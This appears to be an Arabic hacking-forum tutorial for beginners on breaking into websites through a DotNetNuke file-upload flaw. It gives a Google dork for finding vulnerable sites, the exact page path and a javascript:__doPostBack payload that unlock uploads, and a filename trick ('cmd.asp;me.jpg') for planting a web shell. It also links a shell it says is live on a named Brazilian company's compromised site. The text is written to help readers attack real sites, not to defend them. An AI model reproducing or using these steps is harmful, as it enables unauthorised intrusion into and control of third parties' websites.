ثغرة سهلة جدا جاهزة للمبتدئين + شرح بسيط لاختراق المواقع

ثغرة سهلة جدا جاهزة للمبتدئين + شرح بسيط

لاختراق المواقع

عالم القرصنةو الاختراق

السلام عليكم

طبعا معظمكم يتسائل, ما

هي الثغرة ؟

انا سوف اقول لك , الثغرة هي خطء برمجي على سكربت مركب في الموقع ,

يمكننا هذا الخطء من اختراق الموقع عن طريق استغلال معين.

و الان ما معنى استغلال ؟

الاستغلال هي طريقة نقوم بها لاختراق الموقع , و كل ثغرة لها استغلال

معين . احيانا يظهر لنا الاستغلال باسورد و يوزر نايم الادمن و احيانا

يمكننا من رفع شل …

ما هو الشل ؟

يمكننا الشل بعد رفعه على مساحة الموقع المراد اختراقه (وذلك يتم عن

طريق الاستغلال) من التحكم الكامل بجميع ملفات الموقع .و هناك انواع عديدة

منه .

الان فهمنا تقريبا كيف يتم اختراق المواقع بالشكل الشائع : البحث عن

الثغرات – استغلال الثغرات – رفع الشل …

و الان , كي نقوم بالتطبيق البسيط على ما سبق,سوف اقوم بشرح طريقة

استغلال ثغرة , هذه الثغرة في سكربت اسمهDotNetNuke

هذه الثغرة تمكننا من رفع ملف على مساحة الموقع , يمكننا استغلالها لرفع

شل مثلا او اي ملف اخر , ضمن صلاحياتمحددة …

الثغرة سهلة جدا جدا جدا و لكنها جيدة نوعا ما.

اولا : كيف اجد مواقع

مصابة بهذه الثغرة ؟

يمكننا البحث عن المواقع المصابة المراد اختراقها عن طريق محرك البحث

Googleبالاستعانة بكلة مخصصة تسمى ال Dork

ال Dork بمعنى اوضح هي كلمة نبحث عنها في محركات البحث تساعدنا على

ايجاد المواقع المصابة بالثغرة , و لكل ثغرة Dork مخصص .

اما دورك هذه الثغرة فهو :

inurl:Portals/0/

ضع هذه الكلمة في Google وسوف ترى اكثر من

400 موقع مصاب

اختر واحد كي تبدا بالاختراق ..

كيف اخترقه ؟

كما قلت لك سابقا ان الاختراق يتم عن طريق

الاستغلال و الاستغلال لهذه الثغرة هو كالتالي

1- ضع هذا في Google :

inurl:Portals/0/

سوف يضهر الكثير من المواقع المصابة ا ختر احدها و طبق الاستغلال

التالي .

الاستغلال على الشكل

التالي

بعد اختيارك للموقع ضع هذا بعد عنوان الموقع Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx

حتى نحصل على الشكل التالي www.xxxxx.com/ Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx

سوف تظهر صفحة مثل هذه , افعل كمافي الصورة

يعني نختار File و Root

بعد ذلك اضغ هذا السكربت في المتصفح و اضغط Enter

javascript:__doPostBack('ctlURL$cmdUpload','')

ما الفائدة من هذه الخطوة ؟

بعد اتمام هذه الخطوة يمكننا رفع اي ملفات نريدها على مساحة الموقع

شرط ان تكون بهذه الصيغ : Jepg ,Jpg,Pdf, الخ

بعد اضافة السكربت , نلاحظ تحديث للصفحة و سيظهر بعد ذلك مربع لرفع

الملفات , نحن هدفنا ان نرفع شل , او ملف txt يثبت الاختراق

يعني مثل هذا : http://www.hidroclean.com.br/Portals/0/Li0n-PaL.txt

اما اذا اردت ان ترفع شل , اختر الشل و اضغط على Upload Selected File

كيف يكمننا الدخول على

الشل او الملف الذي تم الرفعه؟

الشل يكون في المسار التالي

http://xxx.com/ portals/0/xxx.jpg

و هذا شل على موقع برازيلي مصاب هدية لكم

http://www.hidroclean.com.br/Portals/0/cmd.asp;me.jpg

اتمنى لكم التوفيق و اي استفسار انا جاهز.

الاستغلال لا يطبك على كل المواقع الموجودة في البحث فمن الممكن ين يكون

صاحب الموقع قام بترقيع الثغرة يعني حماية موقعه